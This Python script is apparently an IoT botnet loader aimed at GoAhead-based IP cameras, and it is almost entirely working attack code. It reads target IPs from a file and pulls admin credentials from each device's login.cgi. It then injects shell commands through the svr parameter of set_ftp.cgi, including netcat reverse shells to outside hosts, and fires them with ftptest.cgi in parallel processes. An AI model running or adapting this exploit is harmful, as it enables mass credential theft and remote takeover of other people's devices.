import socketimport sysimport reimport timefrom multiprocessing import P

1. import socket
2. import sys
3. import re
4. import time
5. from multiprocessing import Process
6.  
7. def retrieve_credentials(host, port):
8. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
9. try:
10. sock.settimeout(5)
11. sock.connect((host, int(port)))
12. except:
13. sock.close()
14. return 0
15. # Retrieved credentials
16. try:
17. sock.send("GET login.cgi HTTP/1.0\n\n")
18. resp = sock.recv(1024)
19. # Double receive
20. resp += sock.recv(1024)
21. except:
22. sock.close()
23. return 0
24. if not resp:
25. sock.close()
26. return 0
27. index = resp.find("var login")
28. done = resp[index:]
29. m = done.strip("\r\n")
30. l = m.split(" ")
31. if len(l) <= 1:
32. sock.close()
33. return 0
34. try:
35. preuser = l[1].strip("var \r\n")
36. prepass = l[2].strip("var \r\n")
37. except:
38. return 0
39. username = preuser[11:].strip('";')
40. password = prepass[11:].strip('";')
41. sock.close()
42. return username + ":" + password
43.  
44. def submit_payload(host, port, payload):
45. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
46. try:
47. sock.settimeout(5)
48. sock.connect((host, int(port)))
49. except:
50. sock.close()
51. return 0
52. try:
53. sock.send(payload)
54. except:
55. sock.close()
56. return 0
57. sock.close()
58. return 1
59.  
60. def submit_payload2(host, port, payload):
61. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
62. try:
63. sock.settimeout(5)
64. sock.connect((host, int(port)))
65. except:
66. sock.close()
67. return 0
68. try:
69. sock.send(payload)
70. except:
71. sock.close()
72. return 0
73. now = time.clock()
74. while (time.clock() - now) < 30:
75. try:
76. resp = sock.recv(1024)
77. except:
78. break
79. if not resp:
80. break
81. if "ok" in resp:
82. sock.close()
83. return 1
84. sock.close()
85. return 0
86.  
87. def run(host, port):
88. ret = retrieve_credentials(host, port)
89. if ret == 0:
90. return
91. str = ret.split(":")
92. username = str[0]
93. password = str[1]
94. if username != "" and password != "":
95. print "Retrieved credentials %s:%s" % (str[0], str[1])
96. else:
97. return
98. # Continue assuming we've retrieved the credentials successfully
99. payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+nexusiotsolutions.net+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
100. for i in open("payload_file", "r").readlines():
101. line = i.strip("\r\n")
102. payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginps=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28" + line + "%29 HTTP/1.0\n\n"
103. ret = submit_payload(host, port, payload)
104. if ret == 0:
105. print "failed to send payload - %s (timeout?)" % (host)
106. return
107. payload2 = "GET /ftptest.cgi?loginuse=%s&loginps=%s HTTP/1.0\n\n" % (username, password)
108. ret = submit_payload2(host, port, payload2)
109. if ret == 0:
110. print "failed to send payload - %s (timeout?)" % (host)
111. return
112. """payload = "GET /set_ftp.cgi?loginuse=" + username + "&loginpas=" + password + "&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+37.48.99.233+1234+-e+%2Fbin%2Fsh%29 HTTP/1.0\n\n"
113. ret = submit_payload(host, port, payload)
114. if ret == 0:
115. print "Failed to send initial payload"
116. return
117. print "Sent initial payload, building & preparing to send the second"
118. payload2 = "GET /ftptest.cgi?loginuse=%s&loginpas=%s HTTP/1.0\n\n" % (username, password)
119. ret = submit_payload2(host, port, payload2)
120. if ret == 0:
121. print "Failed to send submit payload"
122. return"""
123.  
124. if __name__ == "__main__":
125. for i in open("goahead", "r").readlines():
126. line = i.strip("\r\n")
127. info = line.split(":")
128. ip = info[0]
129. port = 81
130. p = Process(target=run, args=(ip,port,))
131. p.start()